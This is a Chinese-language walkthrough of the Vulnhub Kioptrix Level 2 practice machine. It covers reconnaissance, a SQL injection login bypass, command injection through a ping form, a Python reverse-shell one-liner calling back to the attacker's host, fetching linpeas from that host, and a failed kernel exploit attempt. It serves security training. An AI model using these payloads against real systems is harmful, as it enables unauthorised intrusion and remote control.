Vulnhub之Kioptrix Level 2靶机详细测试过程
Kioptrix Level 2
作者:jason_huawen
靶机基本信息
名称:Kioptrix: Level 1.1 (#2)
地址:https://www.vulnhub.com/entry/kioptrix-level-11-2,23/
识别目标主机IP地址
─(root💀kali)-[~/Vulnhub/Kioprtix2]
└─# netdiscover -i eth1
Currently scanning: 172.18.220.0/16 | Screen View: Unique Hosts
12 Captured ARP Req/Rep packets, from 4 hosts. Total size: 720
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.187.1 00:50:56:c0:00:01 3 180 VMware, Inc.
192.168.187.132 00:0c:29:8a:42:50 2 120 VMware, Inc.
192.168.187.254 00:50:56:fe:ae:b9 4 240 VMware, Inc.
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.187.132
NMAP扫描
┌──(root💀kali)-[~/Vulnhub/Kioprtix2]
└─# nmap -sS -sV -sC -p- 192.168.187.132 -oN nmap_full_scan 130 ⨯
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-04 21:53 EST
Nmap scan report for bogon (192.168.187.132)
Host is up (0.00097s latency).
Not shown: 65528 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
|_sshv1: Server supports SSHv1
| ssh-hostkey:
| 1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
| 1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_ 1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
80/tcp open http Apache httpd 2.0.52 ((CentOS))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.0.52 (CentOS)
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 627/udp status
|_ 100024 1 630/tcp status
443/tcp open ssl/http Apache httpd 2.0.52 ((CentOS))
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_128_EXPORT40_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC4_64_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
|_ SSL2_RC4_128_WITH_MD5
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.0.52 (CentOS)
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-10-08T00:10:47
|_Not valid after: 2010-10-08T00:10:47
|_ssl-date: 2022-12-05T00:21:11+00:00; -2h32m55s from scanner time.
630/tcp open status 1 (RPC #100024)
631/tcp open ipp CUPS 1.1
|_http-title: 403 Forbidden
| http-methods:
|_ Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
3306/tcp open mysql MySQL (unauthorized)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
MAC Address: 00:0C:29:8A:42:50 (VMware)
Host script results:
|_clock-skew: -2h32m55s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 55.48 seconds
获得Shell
访问80端口,返回登录页面,发现很容易就Login bypass,
Username: admin' or 1=1 --
Password: 随便
登录成功以后,有ping命令,看是否可以命令注入:
输入框构造:;which python
返回: /usr/bin/python
看是否可以用python建立shell
输入框构造提交:
python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.187.130",5555));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'
在Kali Linux上成功得到反弹回来的shell:
──(root💀kali)-[~/Vulnhub/Kioprtix2]
└─# nc -nlvp 5555
listening on [any] 5555 ...
connect to [192.168.187.130] from (UNKNOWN) [192.168.187.132] 32769
sh-3.00$ id
id
uid=48(apache) gid=48(apache) groups=48(apache)
sh-3.00$ pwd
pwd
/var/www/html
sh-3.00$ ls -alh
ls -alh
total 24K
drwxr-xr-x 2 root root 4.0K Oct 8 2009 .
drwxr-xr-x 8 root root 4.0K Oct 7 2009 ..
-rwxr-Sr-t 1 root root 1.7K Feb 9 2012 index.php
-rwxr-Sr-t 1 root root 199 Oct 8 2009 pingit.php
sh-3.00$
提权
上传linpeas.sh脚本到目标主机的/tmp目录,修改权限,并执行该脚本:
sh-3.00$ cd /tmp
cd /tmp
sh-3.00$ wget http://192.168.187.130:8000/linpeas.sh
wget http://192.168.187.130:8000/linpeas.sh
--19:41:39-- http://192.168.187.130:8000/linpeas.sh
=> `linpeas.sh.1'
Connecting to 192.168.187.130:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 765,824 (748K) [text/x-sh]
100%[====================================>] 765,824 --.--K/s
19:41:39 (26.65 MB/s) - `linpeas.sh.1' saved [765824/765824]
sh-3.00$ chmod +x linpeas.sh
chmod +x linpeas.sh
sh-3.00$ ./linpeas.sh
./linpeas.sh
执行输出结果没有可以利用的漏洞
但是目标主机的系统版本是比较低的:
sh-3.00$ uname -a
uname -a
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux
sh-3.00$
┌──(root💀kali)-[~/Vulnhub/Kioprtix2]
└─# searchsploit kernel 2.6.9
----------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Android Kernel < 4.8 - ptrace seccomp Filter Bypass | android/dos/46434.c
Apple iOS < 10.3.1 - Kernel | ios/local/42555.txt
Apple Mac OSX < 10.6.7 - Kernel Panic (Denial of Service) | osx/dos/17901.c
Apple macOS < 10.12.2 / iOS < 10.2 - '_kernelrpc_mach_port_insert_right_trap' Kernel Reference Count Leak / Use-After-Free | macos/local/40956.c
Apple macOS < 10.12.2 / iOS < 10.2 - Broken Kernel Mach Port Name uref Handling Privileged Port Name Replacement Privilege Escalation | macos/local/40957.c
Apple macOS < 10.12.2 / iOS < 10.2 Kernel - ipc_port_t Reference Count Leak Due to Incorrect externalMethod Overrides Use-After-Free | multiple/dos/40955.txt
DESlock+ < 3.2.6 - 'DLMFDISK.sy's Local kernel Ring0 SYSTEM | windows/local/5144.c
DESlock+ < 3.2.6 - 'DLMFENC.sys' Local Kernel Ring0 link list zero (PoC) | windows/dos/5142.c
DESlock+ < 3.2.6 - 'LIST' Local Kernel Memory Leak | windows/local/5141.c
DESlock+ < 3.2.6 - Local Kernel Ring0 link list zero SYSTEM | windows/local/5143.c
DESlock+ < 3.2.7 - 'probe read' Local Kernel Denial of Service (PoC) | windows/dos/6498.c
DESlock+ < 3.2.7 - Local Kernel Overflow (PoC) | windows/dos/6496.c
DESlock+ < 3.2.7 - Local Kernel Race Condition Denial of Service (PoC) | windows/dos/6497.c
DESlock+ < 4.1.10 - 'vdlptokn.sys' Local Kernel Ring0 SYSTEM | windows/local/16138.c
Jungo DriverWizard WinDriver < 12.4.0 - Kernel Out-of-Bounds Write Privilege Escalation | windows/local/42625.py
Jungo DriverWizard WinDriver < 12.4.0 - Kernel Pool Overflow / Local Privilege Escalation (1) | windows/local/42624.py
Jungo DriverWizard WinDriver < 12.4.0 - Kernel Pool Overflow / Local Privilege Escalation (2) | windows/local/42665.py
Linux Kernel (Solaris 10 / < 5.10 138888-01) - Local Privilege Escalation | solaris/local/15962.c
Linux Kernel 2.4.1 < 2.4.37 / 2.6.1 < 2.6.32-rc5 - 'pipe.c' Local Privilege Escalation (3) | linux/local/9844.py
Linux Kernel 2.4.22-28/2.6.9 - 'igmp.c' Local Denial of Service | linux/dos/686.c
Linux Kernel 2.4.28/2.6.9 - 'ip_options_get' Local Overflow | linux/dos/692.c
Linux Kernel 2.4.28/2.6.9 - 'scm_send Local' Denial of Service | linux/dos/685.c
Linux Kernel 2.4.28/2.6.9 - Memory Leak Local Denial of Service | linux/dos/691.c
Linux Kernel 2.4.28/2.6.9 - vc_resize int Local Overflow | linux/dos/690.c
Linux Kernel 2.4.4 < 2.4.37.4 / 2.6.0 < 2.6.30.4 - 'Sendpage' Local Privilege Escalation (Metasploit) | linux/local/19933.rb
Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'ip_append_data()' Ring0 Privilege Escalation (1) | linux_x86/local/9542.c
Linux Kernel 2.6.0 < 2.6.31 - 'pipe.c' Local Privilege Escalation (1) | linux/local/33321.c
Linux Kernel 2.6.9 < 2.6.11 (RHEL 4) - 'SYS_EPoll_Wait' Local Integer Overflow / Local Privilege Escalation | linux/local/1397.c
Linux Kernel 2.6.9 < 2.6.25 (RHEL 4) - utrace and ptrace Local Denial of Service (1) | linux/dos/31965.c
Linux Kernel 2.6.9 < 2.6.25 (RHEL 4) - utrace and ptrace Local Denial of Service (2) | linux/dos/31966.c
Linux Kernel 3.14-rc1 < 3.15-rc4 (x64) - Raw Mode PTY Echo Race Condition Privilege Escalation | linux_x86-64/local/33516.c
Linux Kernel 4.10.5 / < 4.14.3 (Ubuntu) - DCCP Socket Use-After-Free | linux/dos/43234.c
Linux Kernel 4.8.0 UDEV < 232 - Local Privilege Escalation | linux/local/41886.c
Linux Kernel < 2.6.11.5 - BlueTooth Stack Privilege Escalation | linux/local/4756.c
Linux Kernel < 2.6.14.6 - 'procfs' Kernel Memory Disclosure | linux/local/9363.c
Linux Kernel < 2.6.16.18 - Netfilter NAT SNMP Module Remote Denial of Service | linux/dos/1880.c
Linux Kernel < 2.6.19 (Debian 4) - 'udp_sendmsg' Local Privilege Escalation (3) | linux/local/9575.c
Linux Kernel < 2.6.19 (x86/x64) - 'udp_sendmsg' Local Privilege Escalation (2) | linux/local/9574.txt
Linux Kernel < 2.6.20.2 - 'IPv6_Getsockopt_Sticky' Memory Leak | linux/local/4172.c
Linux Kernel < 2.6.22 - 'ftruncate()'/'open()' Local Privilege Escalation | linux/local/6851.c
Linux Kernel < 2.6.26.4 - SCTP Kernel Memory Disclosure | linux/local/7618.c
Linux Kernel < 2.6.28 - 'fasync_helper()' Local Privilege Escalation | linux/local/33523.c
Linux Kernel < 2.6.29 - 'exit_notify()' Local Privilege Escalation | linux/local/8369.sh
Linux Kernel < 2.6.30.5 - 'cfg80211' Remote Denial of Service | linux/dos/9442.c
Linux Kernel < 2.6.31-rc4 - 'nfs4_proc_lock()' Denial of Service | linux/dos/10202.c
Linux Kernel < 2.6.31-rc7 - 'AF_IRDA' 29-Byte Stack Disclosure (2) | linux/local/9543.c
Linux Kernel < 2.6.34 (Ubuntu 10.10 x86) - 'CAP_SYS_ADMIN' Local Privilege Escalation (1) | linux_x86/local/15916.c
Linux Kernel < 2.6.34 (Ubuntu 10.10 x86/x64) - 'CAP_SYS_ADMIN' Local Privilege Escalation (2) | linux/local/15944.c
Linux Kernel < 2.6.36-rc1 (Ubuntu 10.04 / 2.6.32) - 'CAN BCM' Local Privilege Escalation | linux/local/14814.c
Linux Kernel < 2.6.36-rc4-git2 (x86-64) - 'ia32syscall' Emulation Privilege Escalation | linux_x86-64/local/15023.c
Linux Kernel < 2.6.36-rc6 (RedHat / Ubuntu 10.04) - 'pktcdvd' Kernel Memory Disclosure | linux/local/15150.c
Linux Kernel < 2.6.36.2 (Ubuntu 10.04) - 'Half-Nelson.c' Econet Privilege Escalation | linux/local/17787.c
Linux Kernel < 2.6.37-rc2 - 'ACPI custom_method' Local Privilege Escalation | linux/local/15774.c
Linux Kernel < 2.6.37-rc2 - 'TCP_MAXSEG' Kernel Panic (Denial of Service) (2) | linux/dos/16952.c
Linux Kernel < 3.16.1 - 'Remount FUSE' Local Privilege Escalation | linux/local/34923.c
Linux Kernel < 3.16.39 (Debian 8 x64) - 'inotfiy' Local Privilege Escalation | linux_x86-64/local/44302.c
Linux Kernel < 3.2.0-23 (Ubuntu 12.04 x64) - 'ptrace/sysret' Local Privilege Escalation | linux_x86-64/local/34134.c
Linux Kernel < 3.4.5 (Android 4.2.2/4.4 ARM) - Local Privilege Escalation | arm/local/31574.c
Linux Kernel < 3.5.0-23 (Ubuntu 12.04.2 x64) - 'SOCK_DIAG' SMEP Bypass Local Privilege Escalation | linux_x86-64/local/44299.c
Linux Kernel < 3.8.9 (x86-64) - 'perf_swevent_init' Local Privilege Escalation (2) | linux_x86-64/local/26131.c
Linux Kernel < 3.8.x - open-time Capability 'file_ns_capable()' Local Privilege Escalation | linux/local/25450.c
Linux Kernel < 4.10.13 - 'keyctl_set_reqkey_keyring' Local Denial of Service | linux/dos/42136.c
Linux kernel < 4.10.15 - Race Condition Privilege Escalation | linux/local/43345.c
Linux Kernel < 4.11.8 - 'mq_notify: double sock_put()' Local Privilege Escalation | linux/local/45553.c
Linux Kernel < 4.13.1 - BlueTooth Buffer Overflow (PoC) | linux/dos/42762.txt
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation | linux/local/45010.c
Linux Kernel < 4.14.rc3 - Local Denial of Service | linux/dos/42932.c
Linux Kernel < 4.15.4 - 'show_floppy' KASLR Address Leak | linux/local/44325.c
Linux Kernel < 4.16.11 - 'ext4_read_inline_data()' Memory Corruption | linux/dos/44832.txt
Linux Kernel < 4.17-rc1 - 'AF_LLC' Double Free | linux/dos/44579.c
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation | linux/local/44298.c
Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' Local Privilege Escalation | linux_x86-64/local/44300.c
Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Escalation (KASLR / SMEP) | linux/local/43418.c
Linux Kernel < 4.4.0/ < 4.8.0 (Ubuntu 14.04/16.04 / Linux Mint 17/18 / Zorin) - Local Privilege Escalation (KASLR / SMEP) | linux/local/47169.c
Linux Kernel < 4.5.1 - Off-By-One (PoC) | linux/dos/44301.c
macOS < 10.14.3 / iOS < 12.1.3 - Kernel Heap Overflow in PF_KEY due to Lack of Bounds Checking when Retrieving Statistics | multiple/dos/46300.c
OpenBSD 2.x < 3.3 - 'exec_ibcs2_coff_prep_zmagic()' kernel stack overflow | bsd/local/125.c
Sony Playstation 4 (PS4) < 7.02 / FreeBSD 9 / FreeBSD 12 - 'ip6_setpktopt' Kernel Local Privilege Escalation (PoC) | hardware/local/48644.c
----------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
┌──(root💀kali)-[~/Vulnhub/Kioprtix2]
└─# searchsploit -m linux_x86/local/9542.c
Exploit: Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'ip_append_data()' Ring0 Privilege Escalation (1)
URL: https://www.exploit-db.com/exploits/9542
Path: /usr/share/exploitdb/exploits/linux_x86/local/9542.c
File Type: C source, ASCII text
Copied to: /root/Vulnhub/Kioprtix2/9542.c
将9542.c上传至目标主机:
编译发生错误:
sh-3.00$ gcc -o exploit 9542.c
gcc -o exploit 9542.c
9542.c:109:28: warning: no newline at end of file
在9542.c最后加一行空行,但是执行还是失败:
sh-3.00$ gcc -o exploit 9542.c
gcc -o exploit 9542.c
sh-3.00$ chmod +x exploit
chmod +x exploit
sh-3.00$ ./exploit
./exploit
[-] exploit failed, try again
sh-3.00$
可能是这个漏洞不是很稳定,导致提权失败。
STRIVE FOR PROGRESS,NOT FOR PERFECTION
